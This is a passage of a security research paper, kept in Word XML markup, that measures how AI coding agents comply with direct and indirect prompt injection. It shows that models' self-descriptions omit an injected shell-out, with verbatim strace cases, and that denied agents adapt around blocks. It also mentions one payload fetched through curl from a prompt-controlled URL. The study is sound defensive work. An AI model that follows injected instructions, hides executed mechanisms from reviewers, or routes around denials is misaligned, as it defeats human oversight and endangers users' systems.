        <w:t xml:space="preserve">Neither model issued an explicit refusal on any channel. We report that against the denominator that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">carries meaning: on the injection channels, where a refusal would be the safe response,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>0</m:t>
        </m:r>
        <m:r>
          <m:t>/</m:t>
        </m:r>
        <m:r>
          <m:t>26</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>0</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>12.9</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">); across all usable artifacts,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>0</m:t>
        </m:r>
        <m:r>
          <m:t>/</m:t>
        </m:r>
        <m:r>
          <m:t>41</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>0</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>8.6</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">). The fifteen clean-channel artifacts are a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">control and carry no expectation of refusal, so we keep them out of the headline denominator rather than</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">let them inflate it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Under direct injection both models emitted the injected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system("sh -c ...")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which the oracle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">confirms as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execve("/bin/sh")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—Claude 7 of 7 (</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>64.6</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>100</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">), Gemini 4 of 5 (</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>37.6</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>96.4</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pooled 11/12 (91.7%,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>64.6</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>98.5</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">). That is at least as high as the local models’ pooled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">direct-injection rate of 95/140 (67.9%,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>59.7</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>75.0</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">); the intervals overlap, so the supported claim is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that frontier capability does not lower direct compliance, not that it raises it. Where a model resisted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it did so silently—Gemini in 1 of its 5 usable direct artifacts wrote a clean logging function that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">omitted the injected call rather than issuing a refusal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vendors diverge on indirect injection, where the malicious instruction arrives inside retrieved</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">content (a fabricated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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">policy). Claude ignored it (0 of 8 complied,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>0</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>32.4</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">); Gemini treated it as authoritative and complied every time (6 of 6,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>61</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>100</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">). Same</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">payload, opposite behaviour—a measured difference in robustness to indirect prompt injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP LLM01 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; ATLAS AML.T0051 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). The intervals are wide enough that the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ordering, not the size of the gap, is what the sample supports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This strengthens the premise rather than qualifying it. A more capable model is a more persuasive author</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of the same dangerous footprint, not a safer one: it does not refuse, it complies with direct injection at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">least as often as the local models, and at least one flagship follows indirect injection verbatim. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gate results of Parts I and II are model-independent, so the necessity of the boundary does not decrease</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with model capability. Scope: two models, one injection template, N=8 per model per channel; the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">direction—no refusals, high direct compliance, vendor-split indirect—is the finding, not the rates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="sec:conceal"/>
      <w:r>
        <w:t xml:space="preserve">Self-description diverges from execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One proposed detector compares the model’s own description of its code against the code’s measured</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">behaviour. We can exhibit why it fails as a security signal. We generated 18 injection artifacts with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, then in a separate call asked the model to describe what each one does; the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">footprint is read mechanically from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A case diverges when the footprint shows a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dangerous syscall the description omits—we make no claim about intent, only about the gap between the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stated and the executed. The injected payload is a benign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append, so the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">artifacts are safe to run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fourteen of the eighteen artifacts spawned a shell, and in 5 of those 14 the description omitted it (36%,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>16.3</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>61.2</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">): the description reported a file write and left out the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. (An earlier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">divergence run put the rate at 22% on a different sample; the interval on 5/14 covers that value, so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the two runs are consistent and the rate is sample-dependent.) Two divergent cases, verbatim:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Case 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  STATED : "writes a message to /var/log/myapp.log and also appends 'mirrored' to /tmp/agentsec_run/mirror"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  CODE   : system("sh -c 'echo mirrored &gt;&gt; /tmp/agentsec_run/mirror'");</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  DID    : execve("/bin/sh", ["sh","-c","sh -c 'echo mirrored &gt;&gt; /tmp/agentsec_run/mirror'"]) = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Case 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  STATED : "logs a message to a log file and also appends the string 'mirrored' to another file in /tmp/agentsec_run/"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  CODE   : system("sh -c 'echo mirrored &gt;&gt; /tmp/agentsec_run/mirror'");</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  DID    : execve("/bin/sh", ["sh","-c", ...]) = 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The description omits the mechanism while the data effect it reports is real: the file is in fact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mirrored,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and the summary presents the shell-out as a plain append. A reviewer reading only the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">summary would not see that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ran</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execve("/bin/sh")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and a defender clearing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">artifacts on stated intent (OWASP LLM06, excessive agency </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) would pass it. This is why</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">self-description cannot be the trust boundary: the stated mechanism and the executed mechanism diverge,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and only the syscall footprint carries the truth. The description is a post-hoc summary elicited in a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">separate call, not a reasoning trace, so the finding is narrower than—and consistent with—the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unfaithful-explanation results of Turpin et al. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and Lanham et al. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">omission falls on the shell-out artifacts specifically—benign file-only artifacts describe themselves</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">faithfully—so it tracks the presence of the shell, not noise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="sec:attribution"/>
      <w:r>
        <w:t xml:space="preserve">Behavioural attribution is not a control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The porous gate invites a different move: profile the agent and stop the bad actor before it reaches a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gap. Three candidate signals fail for one structural reason—a manipulated agent chooses its own</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">behaviour, so any signature the defender keys on, the agent can produce or suppress—and the data of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Part III shows each failing in turn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cadence does not attribute. A script that inserts random sleeps shows no cadence separation we can key on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from a live agent’s action cadence (coefficient of variation 0.45 versus 0.54; fifteen of seventeen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inter-action intervals overlap); we ran no formal equivalence test at this sample size, and timing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">separates neither by construction, while Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:matrix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finds no behavioural-speed difference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">between the two forces to key on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stated intent does not attribute. Divergence between a model’s one-sentence description and its measured</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">footprint appeared in 22% of injection cases and in none of the autonomous or benign cases; where it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">appeared the description omitted the executed mechanism (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:conceal">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), and a non-manipulated model mostly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">narrates honestly while a manipulated one writes a faithful malicious description and drives the divergence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to zero.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reaction to a denial is a real behaviour that points at coverage. A denied agent adapts on 90% of steps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and stopped in none of eight trials (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:enum">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), holding the objective fixed and enumerating</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mechanisms; that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">identifies a persistent actor, not an attributable one, and it returns the weight to coverage: blocking one</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">path routes the agent to the next.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The three routes reach one wall.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LLM agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">names no behavioural class; it is any distribution its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">controller chooses, able to pace like a human, retry like a port scanner, or stop after one block. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">adversarially robust facts are what the actor did at the boundary (its footprint) and whether it was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">authorized (the policy at the gate), not what it looks like. Certify the gate; do not profile the actor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="sec:telemetry"/>
      <w:r>
        <w:t xml:space="preserve">Resource footprint is not the security signal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One more candidate signal, resource use, fails at the host. Generation and execution sit about 2700x apart</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in resident memory: the generation phase holds a 5.1 GB model in the server process, and the compiled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">artifact runs in 1.92 MB with near-zero CPU. The weight of the agentic loop is in the model-server trust</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">domain, off the orchestrator host, reached over an RPC the orchestrator waits on in roughly 20 MB of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">interpreter. A resource-anomaly detector on the orchestrator sees neither the generation (it looks like</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">idle network wait) nor the artifact (it looks like any small process). The security-relevant signal is the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">syscall footprint and the egress, and the egress has to be captured at the network: the study corpus made</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">zero network calls (0/360 injection, 0/240 persistence, 0/45 autonomous), and an egress-tasked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scenario networked in only 1 of 3 generations—when it did, it fetched and ran a payload from a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prompt-controlled URL through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">popen</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>→</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(T1105 ingress tool transfer,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">T1071.001 web protocols, T1059 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Whoever owns the URL owns what runs next; resource use does</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">not carry that fact, and the network boundary does.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="the-composed-sandbox-under-attack"/>
      <w:r>
        <w:t xml:space="preserve">The composed sandbox under attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="sec:composed"/>
      <w:r>
        <w:t xml:space="preserve">Five invariants, and where each is enforced</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Parts I–III measured controls in isolation. A deployment runs them together, so the question a defender</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">actually faces is whether an assembled sandbox holds under attack, and against what. We state five</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invariants and bind each to the layer that enforces it, rather than let</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">zero violations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quietly mean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we defined the invariants as whatever held</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">I1 filesystem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: no write, create, or remove outside a scratch allowlist—enforced by the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Landlock default-deny ruleset of Part II.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">I2 execution</w:t>
      </w:r>
